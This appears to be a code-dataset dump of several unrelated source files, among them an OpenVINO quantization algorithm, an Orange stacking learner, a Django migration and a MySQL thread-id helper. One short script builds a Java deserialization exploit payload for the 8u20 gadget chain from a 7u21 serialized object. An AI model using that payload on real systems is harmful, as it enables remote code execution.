] | 4,948 | 2020-04-22T15:12:39.000Z | 2022-03-31T18:45:42.000Z | tools/pot/openvino/tools/pot/algorithms/quantization/accuracy_aware_common/algorithm.py | thomas-yanxin/openvino | 031e998a15ec738c64cc2379d7f30fb73087c272 | [
"Apache-2.0"
] | 991 | 2020-04-23T18:21:09.000Z | 2022-03-31T18:40:57.000Z | # Copyright (C) 2020-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import random
from copy import deepcopy
from sys import maxsize
import numpy as np
from .utils import create_metric_config, is_preset_performance, \
get_mixed_preset_config, evaluate_model, get_num_of_quantized_ops
from ..utils import load_hardware_config
from ...algorithm import Algorithm
from ...algorithm_selector import COMPRESSION_ALGORITHMS
from ....algorithms.quantization import utils as eu
from ....graph import node_utils as nu
from ....graph.model_utils import save_model, get_nodes_by_type
from ....graph.transformer import GraphTransformer
from ....samplers.creator import create_sampler
from ....statistics.statistics import TensorStatistic
from ....utils.logger import get_logger
from ....utils.telemetry import send_event
logger = get_logger(__name__)
# pylint: disable=R0912
@COMPRESSION_ALGORITHMS.register('AccuracyAwareCommon')
class AccuracyAwareCommon(Algorithm):
name = 'AccuracyAwareCommon'
def __init__(self, config, engine):
super().__init__(config, engine)
# configure default parameters
default_config = {
'metric_subset_ratio': 0.5,
'ranking_subset_size': config.get('ranking_subset_size', min(len(engine.data_loader), 300)),
'max_iter_num': maxsize,
'maximal_drop': 0.01,
'drop_type': 'absolute',
'use_prev_if_drop_increase': True,
'base_algorithm': 'DefaultQuantization',
'annotation_free': False,
'tune_hyperparams': False,
'annotation_conf_threshold': 0.6,
'convert_to_mixed_preset': False
}
for setting in default_config:
if setting not in self._config:
self._config[setting] = default_config[setting]
self._config.convert_to_mixed_preset = self._config.convert_to_mixed_preset and \
is_preset_performance(self._config)
save_dir = self._config.get('exec_log_dir', os.path.curdir)
self._config.intermediate_log_dir = os.path.join(save_dir, 'accuracy_aware_intermediate')
self._engine.calculate_metrics = True
# Create initial quantization algorithms
self._quantization_algo = self._create_quantization_algo(self._config, 'AAQuantizationAlgorithm', self._engine)
self._preset_conversion_algo = self._create_quantization_algo(get_mixed_preset_config(self._config),
'AAConversionAlgorithm', self._engine)
self._grid_search_algo = COMPRESSION_ALGORITHMS.get('ParamsGridSearchAlgorithm')(self._config, engine)
self._grid_search_algo.default_algo = self._quantization_algo
# Configure metrics
self._metrics_config = create_metric_config(self._engine, self._config)
self._baseline_metric = {metric.name: metric.baseline_value
for metric in self._config.metrics
if metric.name in self._metrics_config} \
if self._config.metrics and \
all('baseline_value' in metric.keys() for metric in self._config.metrics) \
else {}
self._max_drop_by_name = {}
self._original_per_sample_metrics = None
self._output_node_name, self._stats_layout = None, None
self._quantized_layers_num = 0
self._dataset_size = len(self._engine.data_loader)
metric_subset_size = int(self._dataset_size * self._config.metric_subset_ratio)
self._diff_subset_indices = sorted(random.sample(range(self._dataset_size), metric_subset_size)) \
if metric_subset_size < self._dataset_size and self._baseline_metric \
else list(range(self._dataset_size))
self._graph_transformer = GraphTransformer(load_hardware_config(self._config))
self.default_steps_size = 0.005
self.total_exec_steps = self._config.get('stat_subset_size', self._dataset_size)
self._quantization_algo.default_steps_size = self.default_steps_size
if self._config.convert_to_mixed_preset:
self._preset_conversion_algo.default_steps_size = self.default_steps_size
self._stats_collector = None
self._precision_change_to = 'floating-point'
self._need_to_change_scope = True
self._change_conditions = None
self._exclude_bad_nodes = False
@property
def change_original_model(self):
return True
def register_statistics(self, model, stats_collector):
self._stats_collector = stats_collector
self._quantization_algo.register_statistics(model, stats_collector)
if self._config.convert_to_mixed_preset:
self._preset_conversion_algo.register_statistics(model, stats_collector)
if self._config.tune_hyperparams:
self._grid_search_algo.register_statistics(model, stats_collector)
def run(self, model):
""" this function applies the accuracy aware
quantization scope search algorithm
:param model: model to apply algo
:return model with modified quantization scope to match
required accuracy values
"""
if not self._metrics_config:
logger.info('Could not find the required metrics for optimization in the engine. '
'Stop AccuracyAware optimization. '
'Available metrics: %s.', ', '.join(self._engine.get_metrics_attributes()))
logger.update_progress(self.total_exec_steps)
return model
# configure stats layout to collect raw output
# to calculate persample difference for special metrics
self._output_node_name = nu.get_node_input(
model.get_final_output_nodes()[0], 0).name # gets first output node
for metric_config in self._metrics_config.values():
if metric_config.persample.is_special:
self._stats_layout = {self._output_node_name: {'output_logits': TensorStatistic(lambda a: a)}}
break
self._request_alt_statistics(model)
print_progress = logger.progress_bar_disabled
if not self._baseline_metric or self._config.annotation_free:
# collect predictions of original model
if self._config.annotation_free:
self._engine.dump_prediction_to_annotation = True
self._engine.annotation_conf_threshold = self._config.annotation_conf_threshold
self._baseline_metric, self._original_per_sample_metrics = self._collect_baseline(model, print_progress)
logger.info('Baseline metrics: %s', self._baseline_metric)
# update dataset info
if self._config.annotation_free:
self._dataset_size = len(self._engine.data_loader)
self._diff_subset_indices = list(range(self._dataset_size))
# configure values of metrics maximum drop
max_drop = self._config.maximal_drop
if self._config.drop_type == 'relative':
self._max_drop_by_name = {name: value * max_drop for name, value in self._baseline_metric.items()}
else:
self._max_drop_by_name = {name: max_drop for name, value in self._baseline_metric.items()}
# quantize model
quantized_model, metrics_accuracy_drop, quantized_metrics_per_sample = \
self._quantize_and_evaluate(deepcopy(model),
self._quantize_model,
print_progress=print_progress)
self._save_intermediate_model(quantized_model)
if self._drop_restrictions_are_met(metrics_accuracy_drop):
send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, 0))
return quantized_model
default_quantization_config = self._quantization_algo.config
# change quantization preset of the model if possible
if self._config.convert_to_mixed_preset:
quantized_model, metrics_accuracy_drop, quantized_metrics_per_sample = \
self._quantize_and_evaluate(deepcopy(model),
self._convert_model_to_mixed_preset,
print_progress=print_progress)
self._save_intermediate_model(quantized_model)
if self._drop_restrictions_are_met(metrics_accuracy_drop):
send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, 0))
return quantized_model
default_quantization_config = self._preset_conversion_algo.config
if not self._original_per_sample_metrics:
_, self._original_per_sample_metrics = \
self._evaluate_model(model=model, subset_indices=self._diff_subset_indices)
# change quantization parameters of the model
if self._config.tune_hyperparams:
worst_ranking_subset = self._create_hardest_ranking_subset(quantized_metrics_per_sample)
self._grid_search_algo.update_config(default_quantization_config)
self._grid_search_algo.set_subset_and_metric(worst_ranking_subset,
self._metrics_config)
self._engine.allow_pairwise_subset = True
updated_quantized_model, updated_metrics_accuracy_drop, updated_quantized_metrics_per_sample = \
self._quantize_and_evaluate(deepcopy(model),
self._search_optimal_parameters,
print_progress=print_progress)
default_mean_drop = np.mean([value for name, value in metrics_accuracy_drop.items()])
updated_mean_drop = np.mean([value for name, value in updated_metrics_accuracy_drop.items()])
if updated_mean_drop < default_mean_drop:
logger.info('Applying the best configuration')
quantized_model = updated_quantized_model
metrics_accuracy_drop = updated_metrics_accuracy_drop
quantized_metrics_per_sample = updated_quantized_metrics_per_sample
self._engine.allow_pairwise_subset = False
self._save_intermediate_model(quantized_model)
if self._drop_restrictions_are_met(metrics_accuracy_drop):
send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, 0))
return quantized_model
# we need to do this for more efficient memory consumption which is too high
# because _change_quantization_scope(..) will allocate one more model
del model
if self._need_to_change_scope:
return self._change_quantization_scope(quantized_model,
metrics_accuracy_drop,
quantized_metrics_per_sample)
logger.info('Quantization scope was not changed due to algo conditions: %s', self._change_conditions)
logger.update_progress(self.total_exec_steps)
return quantized_model
def _collect_baseline(self, model, print_progress):
logger.info('Start original model inference')
return self._evaluate_model(model=model,
print_progress=print_progress)
def _change_quantization_scope(self, model, original_accuracy_drop,
fully_quantized_metrics_per_sample):
"""Applies greedy search to remove fake-quantize nodes that degrade metric values
:param model: fully quantized model
:param original_accuracy_drop: dictionary of per-metric drops
of fully quantized model {metric_name: drop_value}
:param fully_quantized_metrics_per_sample: dictionary of per-sample metrics values
of fully quantized model
:return model: model with new quantization scope
"""
self._quantized_layers_num = \
self._get_num_of_quantized_ops(model)
logger.info('The total number of quantized operations in the graph: %d', self._quantized_layers_num)
logger.info('Changing fake quantize nodes scope')
all_changed_nodes_names = []
all_ops_in_targeted_prec = set()
drop_functor = lambda a: (original_accuracy_drop[a] - self._max_drop_by_name[a]) / self._baseline_metric[a]
metric_to_optimize = sorted(original_accuracy_drop.keys(), key=drop_functor)[-1]
logger.info('Optimizing %s metric', metric_to_optimize)
accuracy_drop = original_accuracy_drop[metric_to_optimize]
# calculate importance of fq nodes
node_importance = self._get_node_importance(model,
metric_to_optimize,
fully_quantized_metrics_per_sample)
quantized_metrics_per_sample = None
reached_required_drop = False
changed_all_fq = False
is_step_back = True
iteration = 0
excluded_nodes = []
for iteration in range(self._config.max_iter_num):
# save model and metrics from previous iteration
model_prev_iter = deepcopy(model)
metrics_prev_iter = deepcopy(quantized_metrics_per_sample)
if not node_importance:
logger.info(
'All layers have been checked and the AccuracyAwareQuantization '
'will not be able to achieve the required accuracy drop')
changed_all_fq = True
break
# greedy removal of the FQ node with the highest importance score
fq_name_to_change = node_importance.pop(0)
model, changed_nodes, ops_in_targeted_prec = self._modify_model_in_scope(model,
[fq_name_to_change])
logger.debug('Changed a block of %d FQ layers: %s', len(changed_nodes), changed_nodes)
logger.info('Reverted %d layers to the %s precision: %s',
len(ops_in_targeted_prec), self._precision_change_to, ', '.join(ops_in_targeted_prec))
all_changed_nodes_names.append(str(changed_nodes))
all_ops_in_targeted_prec.update(ops_in_targeted_prec)
# save intermediate model
self._save_intermediate_model(model)
# calculate drop for new quantization scope
final_metrics, quantized_metrics_per_sample = \
self._evaluate_model(model=model,
per_sample_subset_indices=self._diff_subset_indices,
print_progress=True)
metrics_accuracy_drop = {name: params.comparator(self._baseline_metric[name]
- final_metrics[name])
for name, params in self._metrics_config.items()}
new_accuracy_drop = metrics_accuracy_drop[metric_to_optimize]
logger.info('Accuracy drop with the new quantization scope is %s', metrics_accuracy_drop)
# removed all fake-quantize layers from the model
if not get_nodes_by_type(model, ['FakeQuantize']):
logger.info('Removed all FQ layers from the network!')
changed_all_fq = True
break
# all drop restrictions are met
if self._drop_restrictions_are_met(metrics_accuracy_drop):
reached_required_drop = True
break
# continue greedy fq removal
if self._max_drop_by_name[metric_to_optimize] < new_accuracy_drop <= accuracy_drop \
or (new_accuracy_drop > accuracy_drop and is_step_back):
is_step_back = False
accuracy_drop = new_accuracy_drop
continue
# if after fq removal drop has increased
# calculate node importance of the model (from previous iteration)
if new_accuracy_drop > accuracy_drop and self._config.use_prev_if_drop_increase:
model = model_prev_iter
quantized_metrics_per_sample = metrics_prev_iter
all_changed_nodes_names.remove(str(changed_nodes))
all_ops_in_targeted_prec.difference_update(ops_in_targeted_prec)
if self._exclude_bad_nodes:
excluded_nodes.extend(changed_nodes)
logger.debug('%s added to excluded list: %s', str(changed_nodes), str(excluded_nodes))
is_step_back = True
accuracy_drop = new_accuracy_drop
# if drop restriction for the current metric is satisfied, select the next metric
# and calculate node importance
if new_accuracy_drop <= self._max_drop_by_name[metric_to_optimize]:
metric_to_optimize = sorted(original_accuracy_drop.keys(),
key=lambda a, current_drop=metrics_accuracy_drop:
(current_drop[a] - self._max_drop_by_name[a]) /
self._baseline_metric[a])[-1]
logger.info('Optimizing %s metric', metric_to_optimize)
accuracy_drop = original_accuracy_drop[metric_to_optimize]
is_step_back = False
del model_prev_iter, metrics_prev_iter
logger.info('Re-calculating node importance')
node_importance = self._get_node_importance(model,
metric_to_optimize,
quantized_metrics_per_sample,
excluded_nodes)
if changed_all_fq or not reached_required_drop:
# Do not remove or change!
logger.info('AccuracyAwareQuantization could not achieve the required accuracy drop.',
force=True)
if iteration + 1 >= self._config.max_iter_num:
logger.info('Reached maximum number of iterations.')
if not changed_all_fq:
logger.debug('Changed FakeQuantize nodes:\n %s', '\n'.join(all_changed_nodes_names))
logger.info(' %d out of %d layers have been reverted back to the %s precision: %s',
len(all_ops_in_targeted_prec), self._quantized_layers_num, self._precision_change_to,
', '.join(all_ops_in_targeted_prec))
send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, len(all_ops_in_targeted_prec)))
logger.update_progress(self.total_exec_steps)
return model
def _get_node_importance(self, model, metric_name, qmodel_per_sample_metrics=None, excluded_nodes=None):
"""Creates a list of fake-quantize nodes importance in descending order
based on their contribution to metric degradation
:param model: model with fake-quantize nodes
:param metric_name: metric to be taken into consideration
:param qmodel_per_sample_metrics: per-sample metrics values of quantized model
:return list of node names
"""
if qmodel_per_sample_metrics is None:
# get quantized model predictions
_, qmodel_per_sample_metrics = self._evaluate_model(model=model,
subset_indices=self._diff_subset_indices)
ranking_subset = self._get_ranking_subset(qmodel_per_sample_metrics, metric_name) # not sorted
node_importance_score = self._calculate_node_importance_scores(model,
ranking_subset,
metric_name,
excluded_nodes)
# sort by error value and then by node name
node_importance = sorted(node_importance_score.items(), key=lambda x: (x[1], x[0]), reverse=True)
node_importance = [n[0] for n in node_importance]
return node_importance
def _get_ranking_subset(self, qmodel_per_sample_metrics, metric_name, from_id=0):
"""Determines samples on which the quantized model predicts worse than on the original model
:param qmodel_per_sample_metrics: per-sample metrics values of the quantized model
:param metric_name: metric to take into account
:return a list of image ids
"""
persample_metric = self._metrics_config[metric_name].persample
sorted_sample_importance = \
persample_metric.sort_fn(self._original_per_sample_metrics[persample_metric.name],
qmodel_per_sample_metrics[persample_metric.name],
reverse=True)
to_id = from_id + self._config.ranking_subset_size
ranking_subset = \
np.array(self._diff_subset_indices)[sorted_sample_importance[from_id:to_id]]
return ranking_subset
def _calculate_node_importance_scores(self, model, ranking_subset, metric_name, excluded_nodes=None):
"""Cuts out FQ layers one after another and measures metric value on ranking subset.
The higher the value, the more important the node.
:param model: graph from which to cut nodes
:param ranking_subset: subset on which the scores will be calculated
:param metric_name: metric to take into account
:return a dictionary of node importance {metric_name: score}
"""
change_fqs = []
node_importance_score = {}
eu.select_evaluation_dataset(self._engine)
fake_quantize_nodes = get_nodes_by_type(model, ['FakeQuantize'])
for node in fake_quantize_nodes:
if excluded_nodes and node.name in excluded_nodes:
continue
if node.name not in change_fqs:
modified_model, modified_fq_layers, _ = self._modify_model_in_scope(deepcopy(model), [node.name])
if not modified_fq_layers:
continue
logger.debug('Changed\\Removed a block of %d FQ layers: %s', len(modified_fq_layers),
modified_fq_layers)
change_fqs += modified_fq_layers
self._engine.set_model(modified_model)
self._engine.allow_pairwise_subset = True
index_sampler = create_sampler(self._engine, samples=list(ranking_subset))
metrics, *_ = self._engine.predict(sampler=index_sampler)
self._engine.allow_pairwise_subset = False
logger.update_progress(self._config.ranking_subset_size)
ranking_metric = self._metrics_config[metric_name].ranking
node_importance_score[node.name] = ranking_metric.comparator(metrics[ranking_metric.name])
eu.reset_dataset_to_default(self._engine)
return node_importance_score
def _modify_model_in_scope(self, model, nodes_names):
return self._graph_transformer.remove_fq_nodes(deepcopy(model), nodes_names)
def compute_total_exec_steps(self, model=None):
total_steps = 0
# add dataset_size to total if baseline not implemented
if not self._baseline_metric or self._config.annotation_free:
total_steps += self._dataset_size
# add dataset_size to total for int8 inference
total_steps += self._dataset_size
# add dataset_size to total in case of conversion to mixed mode
if self._config.convert_to_mixed_preset:
total_steps += self._dataset_size
nodes_length = len(get_nodes_by_type(model, ['Convolution', 'MatMul']))
num_steps = self._config['max_iter_num'] if self._config['max_iter_num'] < maxsize else nodes_length
metric_computing_steps = nodes_length * self._config['ranking_subset_size']
# add ranking_subset_size for num_steps and again computing every 3 steps
total_steps += metric_computing_steps + \
metric_computing_steps * self._config['ranking_subset_size'] * num_steps / 3
# add total run steps (num steps) without one of FQs pairs
total_steps += num_steps * self._dataset_size
# number of statistics computing
total_steps += self._quantization_algo.total_exec_steps
if self._config.convert_to_mixed_preset:
total_steps += self._preset_conversion_algo.total_exec_steps
self.total_exec_steps = total_steps
def _convert_model_to_mixed_preset(self, model):
logger.info('Start quantization in mixed mode')
return self._preset_conversion_algo.run(model)
def _quantize_model(self, model):
logger.info('Start quantization')
return self._quantization_algo.run(model)
def _search_optimal_parameters(self, model):
logger.info('Start parameters grid search')
return self._grid_search_algo.run(model)
def _quantize_and_evaluate(self, model, quantization_algo, print_progress=True):
def calculate_accuracy_drop():
return {metric_name: params.comparator(self._baseline_metric[metric_name]
- quantized_metrics[metric_name])
for metric_name, params in self._metrics_config.items()}
quantized_model = quantization_algo(model)
logger.info('Start compressed model inference')
quantized_metrics, quantized_metrics_per_sample = \
self._evaluate_model(model=quantized_model,
per_sample_subset_indices=self._diff_subset_indices,
print_progress=print_progress)
logger.info('Fully quantized metrics: %s', quantized_metrics)
metrics_accuracy_drop = calculate_accuracy_drop()
logger.info('Accuracy drop: %s', metrics_accuracy_drop)
return quantized_model, metrics_accuracy_drop, quantized_metrics_per_sample
def _drop_restrictions_are_met(self, metrics_accuracy_drop):
return all(metrics_accuracy_drop[name] <= self._max_drop_by_name[name]
for name in self._metrics_config)
def _save_intermediate_model(self, model):
save_model(model,
self._config.intermediate_log_dir,
model_name='intermediate_model')
logger.debug('Intermediate model is saved in %s', self._config.intermediate_log_dir)
def _create_hardest_ranking_subset(self, metrics_per_sample):
worst_ranking_subset = []
while len(worst_ranking_subset) < self._config.ranking_subset_size:
needed_subset_size = self._config.ranking_subset_size - len(worst_ranking_subset)
top_n_samples = int(np.ceil(needed_subset_size / len(metrics_per_sample.keys())))
local_ranking_subset = []
for metric_name in metrics_per_sample:
ranking_subset = self._get_ranking_subset(metrics_per_sample, metric_name, len(worst_ranking_subset))
local_ranking_subset.extend(ranking_subset[:top_n_samples])
worst_ranking_subset.extend(list(set(local_ranking_subset)))
return list(set(worst_ranking_subset))
def _evaluate_model(self, model, per_sample_subset_indices=None,
subset_indices=None, print_progress=True):
metrics, metrics_per_sample = evaluate_model(model, self._engine, self._dataset_size,
subset_indices, print_progress, self._metrics_config,
per_sample_subset_indices, self._output_node_name,
self._stats_layout)
predict_step_size = self._dataset_size if not subset_indices else len(subset_indices)
logger.update_progress(predict_step_size)
return metrics, metrics_per_sample
def _request_alt_statistics(self, model):
pass
def _get_num_of_quantized_ops(self, model):
return get_num_of_quantized_ops(model, self._graph_transformer.fq_removal.quantize_operations)
@staticmethod
def _get_result_aa(metrics_accuracy_drop, num_of_reverted_layers):
try:
return str({'final_drop': dict(metrics_accuracy_drop),
'num_of_reverted_layers': num_of_reverted_layers})
except Exception as e: # pylint: disable=broad-except
logger.info("Error occurred while trying to send telemetry. Details:" + str(e))
return str(None)
@staticmethod
def _create_quantization_algo(algo_config, name, engine):
algo = COMPRESSION_ALGORITHMS.get(algo_config.base_algorithm)(algo_config, engine)
algo.name = name
return algo
| 52.408273 | 119 | 0.651601 | 28,187 | 0.967329 | 0 | 0 | 28,243 | 0.969251 | 0 | 0 | 5,575 | 0.191324 |
17e137bb0de594618d6979cb258b74fc8c2fc07c | 353 | py | Python | Django-React/exemple/api/migrations/0002_rename_created_app_room_created_at.py | S-c-r-a-t-c-h-y/coding-projects | cad33aedb72720c3e3a37c7529e55abd3edb291a | [
"MIT"
] | null | null | null | Django-React/exemple/api/migrations/0002_rename_created_app_room_created_at.py | S-c-r-a-t-c-h-y/coding-projects | cad33aedb72720c3e3a37c7529e55abd3edb291a | [
"MIT"
] | null | null | null | Django-React/exemple/api/migrations/0002_rename_created_app_room_created_at.py | S-c-r-a-t-c-h-y/coding-projects | cad33aedb72720c3e3a37c7529e55abd3edb291a | [
"MIT"
] | null | null | null | # Generated by Django 3.2 on 2021-07-03 21:26
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='room',
old_name='created_app',
new_name='created_at',
),
]
| 18.578947 | 45 | 0.575071 | 270 | 0.764873 | 0 | 0 | 0 | 0 | 0 | 0 | 95 | 0.269122 |
17e1d0ca3e2d0f35d168ba0274703631eff3ed3a | 417 | py | Python | exceptions.py | italovalcy/mef_eline | 230d2bb44b1506adc9900157ca09e920fb37b002 | [
"MIT"
] | 1 | 2021-12-09T17:09:33.000Z | 2021-12-09T17:09:33.000Z | exceptions.py | italovalcy/mef_eline | 230d2bb44b1506adc9900157ca09e920fb37b002 | [
"MIT"
] | 171 | 2021-06-02T20:29:22.000Z | 2022-03-18T17:47:57.000Z | exceptions.py | italovalcy/mef_eline | 230d2bb44b1506adc9900157ca09e920fb37b002 | [
"MIT"
] | 3 | 2021-06-15T18:55:52.000Z | 2021-10-01T14:47:10.000Z | """MEF Eline Exceptions."""
class MEFELineException(Exception):
"""MEF Eline Base Exception."""
class EVCException(MEFELineException):
"""EVC Exception."""
class ValidationException(EVCException):
"""Exception for validation errors."""
class FlowModException(MEFELineException):
"""Exception for FlowMod errors."""
class InvalidPath(MEFELineException):
"""Exception for invalid path."""
| 18.954545 | 42 | 0.717026 | 374 | 0.896882 | 0 | 0 | 0 | 0 | 0 | 0 | 184 | 0.441247 |
17e22362c78802f14ab902ca7c186827af89b8a5 | 4,724 | py | Python | stack.py | Shahadate-Rezvy/Samon_EXplainer | 2ac4a55c06d4ea90cb38dae27e24f7945415a2b6 | [
"MIT"
] | null | null | null | stack.py | Shahadate-Rezvy/Samon_EXplainer | 2ac4a55c06d4ea90cb38dae27e24f7945415a2b6 | [
"MIT"
] | null | null | null | stack.py | Shahadate-Rezvy/Samon_EXplainer | 2ac4a55c06d4ea90cb38dae27e24f7945415a2b6 | [
"MIT"
] | 1 | 2021-11-04T09:44:56.000Z | 2021-11-04T09:44:56.000Z | import numpy as np
from Orange.base import Learner, Model
from Orange.modelling import Fitter
from Orange.classification import LogisticRegressionLearner
from Orange.classification.base_classification import LearnerClassification
from Orange.data import Domain, ContinuousVariable, Table
from Orange.evaluation import CrossValidation
from Orange.regression import RidgeRegressionLearner
from Orange.regression.base_regression import LearnerRegression
__all__ = ['StackedLearner', 'StackedClassificationLearner',
'StackedRegressionLearner', 'StackedFitter']
class StackedModel(Model):
def __init__(self, models, aggregate, use_prob=True, domain=None):
super().__init__(domain=domain)
self.models = models
self.aggregate = aggregate
self.use_prob = use_prob
def predict_storage(self, data):
if self.use_prob:
probs = [m(data, Model.Probs) for m in self.models]
X = np.hstack(probs)
else:
pred = [m(data) for m in self.models]
X = np.column_stack(pred)
Y = np.repeat(np.nan, X.shape[0])
stacked_data = data.transform(self.aggregate.domain)
with stacked_data.unlocked():
stacked_data.X = X
stacked_data.Y = Y
return self.aggregate(
stacked_data, Model.ValueProbs if self.use_prob else Model.Value)
class StackedLearner(Learner):
"""
Constructs a stacked model by fitting an aggregator
over the results of base models.
K-fold cross-validation is used to get predictions of the base learners
and fit the aggregator to obtain a stacked model.
Args:
learners (list):
list of `Learner`s used for base models
aggregate (Learner):
Learner used to fit the meta model, aggregating predictions
of base models
k (int):
number of folds for cross-validation
Returns:
instance of StackedModel
"""
__returns__ = StackedModel
def __init__(self, learners, aggregate, k=5, preprocessors=None):
super().__init__(preprocessors=preprocessors)
self.learners = learners
self.aggregate = aggregate
self.k = k
self.params = vars()
def fit_storage(self, data):
cv = CrossValidation(k=self.k)
res = cv(data, self.learners)
if data.domain.class_var.is_discrete:
X = np.hstack(res.probabilities)
use_prob = True
else:
X = res.predicted.T
use_prob = False
dom = Domain([ContinuousVariable('f{}'.format(i + 1))
for i in range(X.shape[1])],
data.domain.class_var)
stacked_data = data.transform(dom).copy()
with stacked_data.unlocked_reference():
stacked_data.X = X
stacked_data.Y = res.actual
models = [l(data) for l in self.learners]
aggregate_model = self.aggregate(stacked_data)
return StackedModel(models, aggregate_model, use_prob=use_prob,
domain=data.domain)
class StackedClassificationLearner(StackedLearner, LearnerClassification):
"""
Subclass of StackedLearner intended for classification tasks.
Same as the super class, but has a default
classification-specific aggregator (`LogisticRegressionLearner`).
"""
def __init__(self, learners, aggregate=LogisticRegressionLearner(), k=5,
preprocessors=None):
super().__init__(learners, aggregate, k=k, preprocessors=preprocessors)
class StackedRegressionLearner(StackedLearner, LearnerRegression):
"""
Subclass of StackedLearner intended for regression tasks.
Same as the super class, but has a default
regression-specific aggregator (`RidgeRegressionLearner`).
"""
def __init__(self, learners, aggregate=RidgeRegressionLearner(), k=5,
preprocessors=None):
super().__init__(learners, aggregate, k=k, preprocessors=preprocessors)
class StackedFitter(Fitter):
__fits__ = {'classification': StackedClassificationLearner,
'regression': StackedRegressionLearner}
def __init__(self, learners, **kwargs):
kwargs['learners'] = learners
super().__init__(**kwargs)
if __name__ == '__main__':
import Orange
iris = Table('iris')
knn = Orange.modelling.KNNLearner()
tree = Orange.modelling.TreeLearner()
sl = StackedFitter([tree, knn])
m = sl(iris[::2])
print(m(iris[1::2], Model.Value))
housing = Table('housing')
sl = StackedFitter([tree, knn])
m = sl(housing[::2])
print(list(zip(housing[1:10:2].Y, m(housing[1:10:2], Model.Value))))
| 33.503546 | 79 | 0.65834 | 3,722 | 0.787892 | 0 | 0 | 0 | 0 | 0 | 0 | 1,100 | 0.232854 |
17e2be1570ac1669d8bc94548067cec13cd745f2 | 2,049 | py | Python | tests/test8u20/main.py | potats0/javaSerializationTools | eb0291bdd336e28ca5dd9ee86ba6d645f1bf6e8f | [
"Apache-2.0"
] | 124 | 2021-01-21T08:49:20.000Z | 2022-01-23T07:17:30.000Z | tests/test8u20/main.py | potats0/javaSerializationDump | eb0291bdd336e28ca5dd9ee86ba6d645f1bf6e8f | [
"Apache-2.0"
] | 3 | 2021-01-22T03:29:55.000Z | 2021-04-20T06:04:50.000Z | tests/test8u20/main.py | potats0/javaSerializationTools | eb0291bdd336e28ca5dd9ee86ba6d645f1bf6e8f | [
"Apache-2.0"
] | 12 | 2021-01-21T14:09:01.000Z | 2021-11-18T20:13:43.000Z | import yaml
from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock
from javaSerializationTools import ObjectRead
from javaSerializationTools import ObjectWrite
if __name__ == '__main__':
with open("../files/7u21.ser", "rb") as f:
a = ObjectRead(f)
obj = a.readContent()
# 第一步,向HashSet添加一个假字段,名字fake
signature = JavaString("Ljava/beans/beancontext/BeanContextSupport;")
fakeSignature = {'name': 'fake', 'signature': signature}
obj.javaClass.superJavaClass.fields.append(fakeSignature)
# 构造假的BeanContextSupport反序列化对象,注意要引用后面的AnnotationInvocationHandler
# 读取BeanContextSupportClass的类的简介
with open('BeanContextSupportClass.yaml', 'r') as f1:
BeanContextSupportClassDesc = yaml.load(f1.read(), Loader=yaml.FullLoader)
# 向beanContextSupportObject添加beanContextChildPeer属性
beanContextSupportObject = JavaObject(BeanContextSupportClassDesc)
beanContextChildPeerField = JavaField('beanContextChildPeer',
JavaString('Ljava/beans/beancontext/BeanContextChild'),
beanContextSupportObject)
beanContextSupportObject.fields.append([beanContextChildPeerField])
# 向beanContextSupportObject添加serializable属性
serializableField = JavaField('serializable', 'I', 1)
beanContextSupportObject.fields.append([serializableField])
# 向beanContextSupportObject添加objectAnnontations 数据
beanContextSupportObject.objectAnnotation.append(JavaEndBlock())
AnnotationInvocationHandler = obj.objectAnnotation[2].fields[0][0].value
beanContextSupportObject.objectAnnotation.append(AnnotationInvocationHandler)
# 把beanContextSupportObject对象添加到fake属性里
fakeField = JavaField('fake', fakeSignature['signature'], beanContextSupportObject)
obj.fields[0].append(fakeField)
with open("8u20.ser", 'wb') as f:
o = ObjectWrite(f)
o.writeContent(obj)
| 43.595745 | 101 | 0.70815 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 685 | 0.314364 |
17e369dc9f4c67838ee2db6b83ebfbd5715f6650 | 634 | py | Python | getmysql_threadid.py | wang1352083/mysql_tool | 52f7efc319d2732d780913e7b1d7692fab8e791a | [
"MIT"
] | null | null | null | getmysql_threadid.py | wang1352083/mysql_tool | 52f7efc319d2732d780913e7b1d7692fab8e791a | [
"MIT"
] | null | null | null | getmysql_threadid.py | wang1352083/mysql_tool | 52f7efc319d2732d780913e7b1d7692fab8e791a | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import sys
base31=pow(2,31)
base32=pow(2,32)
base=0xFFFFFFFF
'''
mysql 中processlist和mysql.log中记录的 threadid不一致.因此做一个转换
from :processlist.threadid -> mysql.log.threadid
'''
def long_to_short(pid):
if pid <base31:
return pid
elif base31 <= pid < base32:
return pid -base32
else :
return pid & base
def usage(filename):
print "please use "+filename+ " process_thread"
print "\teg:"+filename+ " 12345"
sys.exit(0)
if __name__ == "__main__":
if len(sys.argv) == 2:
pid =int(sys.argv[1])
print long_to_short(pid)
else:
usage(sys.argv[0])
| 22.642857 | 52 | 0.635647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 217 | 0.325826 |
17e3cea80522263e8bf2426fc1e739f762bc47da | 1,756 | bzl | Python | mediapipe_api/csharp_proto_src.bzl | laukaho/MediaPipeUnityPlugin | 77ba1a4d2249b8db09b3a1e975a01f6e50d21e33 | [
"MIT"
] | 20 | 2020-07-28T22:21:04.000Z | 2020-10-05T21:43:46.000Z | mediapipe_api/csharp_proto_src.bzl | laukaho/MediaPipeUnityPlugin | 77ba1a4d2249b8db09b3a1e975a01f6e50d21e33 | [
"MIT"
] | 9 | 2020-08-24T00:18:19.000Z | 2020-09-23T08:32:47.000Z | mediapipe_api/csharp_proto_src.bzl | laukaho/MediaPipeUnityPlugin | 77ba1a4d2249b8db09b3a1e975a01f6e50d21e33 | [
"MIT"
] | 4 | 2020-07-28T22:21:06.000Z | 2020-09-15T19:07:20.000Z | # Copyright (c) 2021 homuler
#
# Use of this source code is governed by an MIT-style
# license that can be found in the LICENSE file or at
# https://opensource.org/licenses/MIT.
"""Proto compiler
Macro for generating C# source files corresponding to .proto files
"""
def csharp_proto_src(name, proto_src, deps):
"""Generate C# source code for *.proto
Args:
name: target name
deps: label list of dependent targets
proto_src: target .proto file path
"""
base_name = proto_src.split("/")[-1]
